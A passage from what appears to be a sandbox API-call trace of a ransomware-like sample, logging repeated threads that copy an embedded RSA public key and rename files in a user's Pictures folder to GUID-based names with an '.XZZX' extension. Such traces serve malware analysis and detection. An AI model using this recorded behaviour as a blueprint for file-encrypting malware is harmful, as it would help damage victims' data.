LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.857] lstrcpyW (in: lpString1=0x2baf460, lpString2="7030D20732FB05AE512C0EDB3744E9F6.XZZX" | out: lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned="7030D20732FB05AE512C0EDB3744E9F6.XZZX" [0248.857] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.857] SetErrorMode (uMode=0x1) returned 0x1 [0248.858] lstrcpyW (in: lpString1=0x2baf860, lpString2="7030D20732FB05AE512C0EDB3744E9F6.XZZX" | out: lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned="7030D20732FB05AE512C0EDB3744E9F6.XZZX" [0248.858] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xf12c3261, Data2=0x8048, Data3=0x46c0, Data4=([0]=0xa0, [1]=0x63, [2]=0xdc, [3]=0xa3, [4]=0x3e, [5]=0x89, [6]=0x67, [7]=0x2e))) returned 0x0 [0248.858] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned 80 [0248.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0248.858] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ED9EAB482373E600F12C3261262ECA48.XZZX") returned 80 [0248.858] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1004 os_tid = 0x12c0 [0249.013] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.013] lstrcpyW (in: lpString1=0x2baf460, lpString2="7852C7A011E028AD2E2E29A016150CF5.XZZX" | out: lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX") returned="7852C7A011E028AD2E2E29A016150CF5.XZZX" [0249.013] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.014] SetErrorMode (uMode=0x1) returned 0x1 [0249.014] lstrcpyW (in: lpString1=0x2baf860, lpString2="7852C7A011E028AD2E2E29A016150CF5.XZZX" | out: lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX") returned="7852C7A011E028AD2E2E29A016150CF5.XZZX" [0249.014] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xf886268a, Data2=0xed42, Data3=0x49db, Data4=([0]=0x96, [1]=0xca, [2]=0x43, [3]=0x76, [4]=0x96, [5]=0x3f, [6]=0xe6, [7]=0x3e))) returned 0x0 [0249.014] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7852C7A011E028AD2E2E29A016150CF5.XZZX") returned 80 [0249.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0249.014] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4443B1944472C976F886268A472DADBE.XZZX") returned 80 [0249.014] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1005 os_tid = 0x12c4 [0249.170] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.170] lstrcpyW (in: lpString1=0x2baf460, lpString2="7ABC26D22C977F5CF918EABE30B863A4.XZZX" | out: lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned="7ABC26D22C977F5CF918EABE30B863A4.XZZX" [0249.170] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.170] SetErrorMode (uMode=0x1) returned 0x1 [0249.170] lstrcpyW (in: lpString1=0x2baf860, lpString2="7ABC26D22C977F5CF918EABE30B863A4.XZZX" | out: lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned="7ABC26D22C977F5CF918EABE30B863A4.XZZX" [0249.170] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x19d0f20, Data2=0xc3bc, Data3=0x47d7, Data4=([0]=0xb4, [1]=0x74, [2]=0x57, [3]=0x71, [4]=0xf8, [5]=0xdc, [6]=0x62, [7]=0xa7))) returned 0x0 [0249.170] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned 80 [0249.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0249.170] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D1DC7B8036ED86E4019D0F2039A86B2C.XZZX") returned 80 [0249.170] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1006 os_tid = 0x12c8 [0249.325] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.325] lstrcpyW (in: lpString1=0x2baf460, lpString2="7E711D900E3B4440AF6B05F612702888.XZZX" | out: lpString1="7E711D900E3B4440AF6B05F612702888.XZZX") returned="7E711D900E3B4440AF6B05F612702888.XZZX" [0249.325] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.326] SetErrorMode (uMode=0x1) returned 0x1 [0249.326] lstrcpyW (in: lpString1=0x2baf860, lpString2="7E711D900E3B4440AF6B05F612702888.XZZX" | out: lpString1="7E711D900E3B4440AF6B05F612702888.XZZX") returned="7E711D900E3B4440AF6B05F612702888.XZZX" [0249.326] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9770695c, Data2=0x118, Data3=0x4886, Data4=([0]=0xab, [1]=0x35, [2]=0xc1, [3]=0x46, [4]=0xf3, [5]=0xbe, [6]=0xa1, [7]=0x7))) returned 0x0 [0249.326] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7E711D900E3B4440AF6B05F612702888.XZZX") returned 80 [0249.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0249.326] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A2F33CA0004F52909770695C030A36D8.XZZX") returned 80 [0249.326] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1007 os_tid = 0x12cc [0249.481] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.481] lstrcpyW (in: lpString1=0x2baf460, lpString2="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" | out: lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" [0249.481] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.481] SetErrorMode (uMode=0x1) returned 0x1 [0249.481] lstrcpyW (in: lpString1=0x2baf860, lpString2="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" | out: lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" [0249.481] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x728fcb1, Data2=0xbbc0, Data3=0x496b, Data4=([0]=0xaf, [1]=0xab, [2]=0xf4, [3]=0x90, [4]=0xa5, [5]=0x24, [6]=0xa4, [7]=0xc0))) returned 0x0 [0249.481] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned 80 [0249.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0249.482] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4F52CFC035D839400728FCB138931D88.XZZX") returned 80 [0249.482] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1008 os_tid = 0x12d0 [0249.638] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.638] lstrcpyW (in: lpString1=0x2baf460, lpString2="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" | out: lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" [0249.638] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.638] SetErrorMode (uMode=0x1) returned 0x1 [0249.638] lstrcpyW (in: lpString1=0x2baf860, lpString2="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" | out: lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" [0249.638] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xbcb8859f, Data2=0xa35, Data3=0x4d5b, Data4=([0]=0xbd, [1]=0x7f, [2]=0x41, [3]=0x39, [4]=0x9e, [5]=0x38, [6]=0x98, [7]=0x81))) returned 0x0 [0249.638] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned 80 [0249.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0249.638] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\476BDFEB031591D7BCB8859F05D0761F.XZZX") returned 80 [0249.638] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1009 os_tid = 0x12d4 [0249.793] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.793] lstrcpyW (in: lpString1=0x2baf460, lpString2="8F82071C3E6AA36071D28504428B87A8.XZZX" | out: lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX") returned="8F82071C3E6AA36071D28504428B87A8.XZZX" [0249.793] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.793] SetErrorMode (uMode=0x1) returned 0x1 [0249.794] lstrcpyW (in: lpString1=0x2baf860, lpString2="8F82071C3E6AA36071D28504428B87A8.XZZX" | out: lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX") returned="8F82071C3E6AA36071D28504428B87A8.XZZX" [0249.794] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x17d4ba2e, Data2=0xfb20, Data3=0x4b27, Data4=([0]=0xab, [1]=0xcc, [2]=0xc1, [3]=0xd5, [4]=0x8f, [5]=0x6, [6]=0xf1, [7]=0x34))) returned 0x0 [0249.794] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8F82071C3E6AA36071D28504428B87A8.XZZX") returned 80 [0249.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0249.794] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8D225FC049B8A1E017D4BA2E4C738628.XZZX") returned 80 [0249.794] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1010 os_tid = 0x12d8 [0249.949] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.949] lstrcpyW (in: lpString1=0x2baf460, lpString2="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" | out: lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" [0249.949] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.949] SetErrorMode (uMode=0x1) returned 0x1 [0249.949] lstrcpyW (in: lpString1=0x2baf860, lpString2="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" | out: lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" [0249.949] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xeee83293, Data2=0xe142, Data3=0x469b, Data4=([0]=0x93, [1]=0xe6, [2]=0x4a, [3]=0x19, [4]=0xd, [5]=0x61, [6]=0xe9, [7]=0x1c))) returned 0x0 [0249.949] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned 80 [0249.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0249.950] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AC503CE63E206EF6EEE8329340DB533E.XZZX") returned 80 [0249.950] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1011 os_tid = 0x12dc [0250.105] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.105] lstrcpyW (in: lpString1=0x2baf460, lpString2="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" | out: lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") 